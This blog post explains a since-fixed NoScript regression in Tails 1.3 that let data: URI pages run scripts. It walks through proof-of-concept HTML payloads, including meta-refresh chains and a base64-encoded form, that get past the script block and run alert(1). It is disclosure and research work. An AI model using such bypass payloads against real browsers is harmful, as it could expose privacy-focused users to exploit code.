A couple of days ago, the Tails Dev discovered that they missed a NoScript update for Tails 1.3 by a couple of hours. It fixes an interesting regression:
v 2.6.9.15
- Fixed regression in 2.6.9.12 causing data: URI documents to be scripting-enabled (thanks GOF for tweet)
I know that Giorgio has some semi-private PoC, but they are not working great in Tails, so I though about giving a try.
This is the relevant excerpt of the
diff
with site indicating a normal URL, and !site a special one, like data::
- blockIt = !site || (this.usingCAPS && !this.restrictSubdocScripting ? this.isUntrusted(site) : !this.isJSEnabled(site)); + blockIt = site && (this.usingCAPS && !this.restrictSubdocScripting ? this.isUntrusted(site) : !this.isJSEnabled(site));
At first, I was thinking about using the classic thing:
<a target=_blank href="data:text/html,<script>alert(1)</script>">clic</a>
But it seems that you need to refresh the page to trigger the Javascript.
<a target=_blank href="data:text/html,<META HTTP-EQUIV='refresh' CONTENT='0'><script>alert(1)</script>">clic</a>
This is working! Time to improve it: why not use refresh twice?
One time to load our payload, and another one to trigger it.
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html, <META HTTP-EQUIV='refresh' CONTENT='0'><script>alert(1)</script>">
Yay!
If you 're lazy clever, you could of course use the
HTTP location header instead, it'll work too.
And since the data: URL-scheme supports base64, you can encode your payload for additional even more l33tness:
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PE1FVEEgSFRUUC1FUVVJVj0ncmVmcmVzaCcgQ09OVEVOVD0nMCc+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pgo=">
Hurray, you can now run your javascript-powered 0-days in script-forbidden Tails!
edit: As said by giorgio, this regression isn't that interesting, since it will be considered cross-domain to everything.